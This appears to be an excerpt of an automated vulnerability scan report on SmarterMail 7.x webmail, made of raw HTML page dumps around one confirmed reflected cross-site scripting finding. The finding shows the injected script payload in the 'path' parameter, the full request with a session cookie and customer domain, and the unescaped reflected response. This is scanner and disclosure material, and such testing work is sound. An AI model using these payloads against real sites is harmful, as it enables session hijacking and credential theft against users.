jAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADUBBZGRUb091dGxvb2sB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA5wdkFkZFRvT3V0bG9vawtkNVpa7ObeR3nu63bHyNVuxyu97yk=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1','tctl00$MPH$UP1','tctl00$MPH$UpdatePanel2'], ['ctl00$BPH$btnDeleteAddToOutlook','ctl00$BPH$btnDeleteSyncML','ctl00$BPH$btnDeleteActiveSync'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
Synchronization
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="divSyncML" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditSyncML(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteSyncML(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divAddToOutlook" style="display:none;" class="TogglableButtons">
<div id="ctl00_BPH_btnEditAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditAddToOutlook(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteAddToOutlook(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divActiveSync" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditActiveSync(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteActiveSync(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="ctl00_trTabStrip" class="TabStripContainer">
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
<li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Add to Outlook</span></span></a></li>
<li class='htsItem ' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SyncML</span></span></a></li>
<li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>ActiveSync</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab2" /><div class='htsClear'><div class='ie6fix'> </div></div></div>
</div>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl03' name='ctl00$MPH$ctl03' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl03_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl03_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu2">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl04' name='ctl00$MPH$ctl04' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu3">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl05' name='ctl00$MPH$ctl05' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
<input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_pvAddToOutlook" />
<div id='ctl00_MPH_pvAddToOutlook' class='' >
<span id="ctl00_MPH_pvAddToOutlook">
<div id="ctl00_MPH_UpdatePanel1">
<div class="HyperGridWrapper" id="ctl00_MPH_grdAddToOutlook">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdAddToOutlook_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_grdAddToOutlookCheckAll" name="ctl00$MPH$grdAddToOutlookCheckAll" /></th><th scope="col" style="overflow: hidden">Outlook Display Name</th><th scope="col" class="leftpad" style="overflow: hidden">Description</th><th scope="col" class="rc ac nw leftpad" style="overflow: hidden">Last Sync</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" name="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" /></td><td></td><td class="leftpad">Outlook Sync Connection</td><td class="rc ac nw leftpad">10/2/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdAddToOut..
Cross-site Scripting
Cross-site Scripting
5
TOTAL
MEDIUM
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /Main/frmStoredFiles.aspx
/Main/frmStoredFiles.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| path | GET | '"--><script>alert(0x0001B4)</script> |
Request
GET /Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Enetsparker(0x0001B4)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:44:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6460
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x0001B4)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUI0KTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZD8ETBn4y53viAfrZ6+Mhn0AyyoN" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$BPH$ButtonUpdatePanel','tctl00$UpdatePanel1','tctl00$MPH$GridUpdatePanel','tctl00$Scripts$UploaderPanel'], ['ctl00$BPH$DeleteButton','ctl00$MPH$UpdateGridButton'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0001B4)</script>
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<span id="ctl00_BPH_ButtonUpdatePanel">
<div id="ctl00_BPH_PublishButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_PublishButton(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteButton" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteButton(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_UploadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="return false;; return false;"><span class="BBInner">Upload</span></a></div>
</span>
<div class="TogglableButtons">
<div id="ctl00_BPH_DownloadButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CheckForRows();; return false;"><span class="BBInner">Download</span></a></div>
</div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<input type="hidden" name="ctl00$MPH$uploadValidationToken" id="ctl00_MPH_uploadValidationToken" value="0145da44d7014edea0816314f1ea86b8" />
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'"--><script>netsparker(0x0001B4)</script>" />
<input type="hidden" name="ctl00$MPH$userField" id="ctl00_MPH_userField" value="dummy" />
<input type="hidden" name="ctl00$MPH$domainField" id="ctl00_MPH_domainField" value="hoytllc.com" />
<div id="ctl00_MPH_GridUpdatePanel">
<span id="ctl00_MPH_GridMenu">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm2' style='z-index: 800'><a class='hmA' href='#'>Download</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>
<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>
</div>
</div>
<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">
</ul>
</div>
</div>
</div>
</div>
</div>
<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">
</div>
<div class="FooterSummary">
</div>
</div>
<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>
<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}
function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}
function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;
if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }
__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>
<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";
var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';
document.AdditionalResizeEvent = resizePage;
var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}
var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');
if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}
uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=0145da44d7014edea0816314f1ea86b8&pathField='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});
uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});
uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});
uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});
uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});
uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});
uploader.bind('UploadProgress', function(up, file) {
isBusy = true;
updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});
uploader.bind('StateChanged', function() {
updateList(false);
});
uploader.init();
};
function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";
$.each(uploader.files, function(i, file) {
inputHTML = '';
if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;
var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});
fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);
fileList[0].scrollTop = 0;
if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();
if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}
return retVal;
}
function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;
if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;
var actionClass = "";
switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}
if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:44:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6460
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x0001B4)</script> - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUI0KTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZD8ETBn4y53viAfrZ6+Mhn0AyyoN" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
